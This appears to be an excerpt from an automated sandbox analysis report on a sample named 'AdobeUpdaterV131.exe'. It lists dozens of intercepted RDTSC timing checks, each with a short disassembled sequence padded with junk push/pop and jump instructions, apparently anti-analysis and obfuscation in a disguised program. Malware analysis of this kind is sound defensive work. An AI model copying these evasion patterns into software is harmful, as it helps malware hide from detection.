            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B256F second address: 9B2573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B2573 second address: 9B2577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B119D second address: 9B11A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B11A3 second address: 9B11C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 jl 00007F09D0D9C3FBh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0D9C3E7h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B11C8 second address: 9B11CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B12ED second address: 9B12F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B12F1 second address: 9B130E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F09D0731CB4h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B1475 second address: 9B1479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B1479 second address: 9B1487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F09D0731CAEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B170C second address: 9B1710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B1710 second address: 9B1722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B1722 second address: 9B1728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B1886 second address: 9B189A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B189A second address: 9B18A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B18A0 second address: 9B18AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F09D0731CA6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B18AA second address: 9B18C4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F09D0D9C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0D9C3DCh 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B18C4 second address: 9B18E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0731CB1h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B18E1 second address: 9B18EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F09D0D9C3D6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B7111 second address: 9B711B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F09D0731CA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9C5FF9 second address: 9C601D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F09D0D9C3E9h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9CD277 second address: 9CD27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9D1B35 second address: 9D1B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9D1B3F second address: 9D1B5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F09D0731CB6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9D19D3 second address: 9D19D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9D19D7 second address: 9D19F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F09D0731CAFh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9D19F3 second address: 9D1A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9CAFD1 second address: 9CAFD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9CAFD7 second address: 9CAFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9CAFDD second address: 9CAFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9CAFE1 second address: 9CAFF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jp 00007F09D0D9C3D6h 0x00000011 pop eax 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9CAFF3 second address: 9CAFFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: A05475 second address: A0547B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: A0547B second address: A0549A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: A0549A second address: A054A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: A054A0 second address: A054A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: A042E4 second address: A042EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: A04443 second address: A04474 instructions: 0x00000000 rdtsc 0x00000002 js 00007F09D0731CA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jc 00007F09D0731CA6h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 push edx 0x00000021 jmp 00007F09D0731CABh 0x00000026 pop edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a pop eax 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: A0472C second address: A04733 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: A04733 second address: A04762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F09D0731CB2h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F09D0731CA8h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: A04762 second address: A04785 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F09D0D9C3D6h 0x00000008 jmp 00007F09D0D9C3E9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: A04785 second address: A0479E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CB5h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: A04D63 second address: A04D68 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: A09AC1 second address: A09ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F09D0731CA6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E806F1 second address: 4E80704 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E80704 second address: 4E80790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F09D0731CB1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F09D0731CAEh 0x00000015 mov ebp, esp 0x00000017 jmp 00007F09D0731CB0h 0x0000001c pop ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F09D0731CAEh 0x00000024 sub ecx, 7FA82498h 0x0000002a jmp 00007F09D0731CABh 0x0000002f popfd 0x00000030 pushad 0x00000031 jmp 00007F09D0731CB6h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E50DA1 second address: 4E50DA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E50DA7 second address: 4E50DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F09D0731CACh 0x00000009 add eax, 213840E8h 0x0000000f jmp 00007F09D0731CABh 0x00000014 popfd 0x00000015 movzx ecx, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov di, EE30h 0x00000023 mov edx, 77FCBD5Ch 0x00000028 popad 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E50DDD second address: 4E50DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3E1h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E50DF2 second address: 4E50E30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F09D0731CADh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F09D0731CACh 0x00000019 or cx, 38D8h 0x0000001e jmp 00007F09D0731CABh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 mov di, ax 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E50E30 second address: 4E50E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0D9C3E6h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E50E52 second address: 4E50E58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E50E58 second address: 4E50E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC07D3 second address: 4EC07E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov cx, B715h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC07E4 second address: 4EC07EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC07EA second address: 4EC0839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d call 00007F09D0731CB9h 0x00000012 pop ecx 0x00000013 jmp 00007F09D0731CB1h 0x00000018 popad 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F09D0731CAFh 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC0839 second address: 4EC0856 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC0856 second address: 4EC08A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F09D0731CB3h 0x00000013 adc ecx, 2DDE44FEh 0x00000019 jmp 00007F09D0731CB9h 0x0000001e popfd 0x0000001f movzx ecx, bx 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E50ACB second address: 4E50B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d jmp 00007F09D0D9C3E2h 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 call 00007F09D0D9C3DEh 0x0000001b pushfd 0x0000001c jmp 00007F09D0D9C3E2h 0x00000021 adc ax, C958h 0x00000026 jmp 00007F09D0D9C3DBh 0x0000002b popfd 0x0000002c pop ecx 0x0000002d pushfd 0x0000002e jmp 00007F09D0D9C3E9h 0x00000033 add ecx, 0B079CF6h 0x00000039 jmp 00007F09D0D9C3E1h 0x0000003e popfd 0x0000003f popad 0x00000040 mov ebp, esp 0x00000042 jmp 00007F09D0D9C3DEh 0x00000047 push dword ptr [ebp+04h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push edx 0x0000004e pop esi 0x0000004f popad 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC055B second address: 4EC0597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push ecx 0x00000007 jmp 00007F09D0731CB2h 0x0000000c mov dword ptr [esp], ebp 0x0000000f jmp 00007F09D0731CB0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F09D0731CAAh 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC0597 second address: 4EC059B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC059B second address: 4EC05A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC05A1 second address: 4EC05B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3DDh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC05B2 second address: 4EC05D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0731CADh 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E90B19 second address: 4E90B29 instructions: 0x00000000 rdtsc 0x00000002 mov ah, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b movsx ebx, cx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E90B29 second address: 4E90B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E90B2E second address: 4E90B5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0D9C3DCh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC062A second address: 4EC066E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0731CAFh 0x00000008 jmp 00007F09D0731CB8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F09D0731CADh 0x0000001b pop esi 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC066E second address: 4EC068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3DAh 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC068E second address: 4EC069D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC069D second address: 4EC06A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC0BFE second address: 4EC0C7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F09D0731CACh 0x00000010 pushad 0x00000011 mov cx, DD57h 0x00000015 pushfd 0x00000016 jmp 00007F09D0731CACh 0x0000001b add ecx, 033181C8h 0x00000021 jmp 00007F09D0731CABh 0x00000026 popfd 0x00000027 popad 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b jmp 00007F09D0731CB6h 0x00000030 mov eax, dword ptr [ebp+08h] 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F09D0731CB7h 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC0C7F second address: 4EC0CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov edx, 67424446h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and dword ptr [eax], 00000000h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F09D0D9C3E9h 0x00000019 jmp 00007F09D0D9C3DBh 0x0000001e popfd 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC0CB8 second address: 4EC0CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov ch, 21h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC0F24 second address: 4EC0F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC0F2A second address: 4EC0F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC0F2E second address: 4EC0F32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E7077E second address: 4E707A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F09D0731CAAh 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F09D0731CAAh 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E707A1 second address: 4E707B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E707B0 second address: 4E707D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F09D0731CAEh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bl, 4Dh 0x00000015 movzx eax, bx 0x00000018 popad 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0C20 second address: 4ED0C28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
